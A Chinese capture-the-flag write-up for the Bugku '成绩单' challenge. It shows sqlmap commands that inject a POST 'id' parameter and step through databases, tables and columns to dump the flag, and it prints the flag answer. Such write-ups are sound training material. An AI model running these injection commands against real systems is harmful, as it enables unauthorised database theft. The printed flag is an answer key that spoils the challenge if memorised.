bugku---成绩单

题目
bugku---成绩单_第1张图片
http://123.206.87.240:8002/chengjidan/index.php

使用sqlmap进行注入
首先输入检测是否有注入点

python E:\Python27\sqlmap\sqlmapproject-sqlmap-6d48df2\sqlmap.py  -u "http://123.206.87.240:8002/chengjidan/index.php" --dbs

bugku---成绩单_第2张图片
此处由POST传参,随便给个id参数"id=1"
开始爆破当前的所有数据库和表名称
输入:

python E:\Python27\sqlmap\sqlmapproject-sqlmap-6d48df2\sqlmap.py  -u "http://123.206.87.240:8002/chengjidan/index.php" --data "id=1" --tables

bugku---成绩单_第3张图片
可以看到
数据库skctf_flag
表fl4g
很容易猜到flag藏在其中
于是继续爆破字段名
输入:

python E:\Python27\sqlmap\sqlmapproject-sqlmap-6d48df2\sqlmap.py  -u "http://123.206.87.240:8002/chengjidan/index.php" --data "id=1"  -D skctf_flag -T fl4g --columns

bugku---成绩单_第4张图片
继续爆破skctf_flag字段内容

python E:\Python27\sqlmap\sqlmapproject-sqlmap-6d48df2\sqlmap.py  -u "http://123.206.87.240:8002/chengjidan/index.php" --data "id=1"  -D skctf_flag -T fl4g -C "skctf_flag" --dump

bugku---成绩单_第5张图片
flag即为
BUGKU{Sql_INJECT0N_4813drd8hz4}

你可能感兴趣的:(CTF)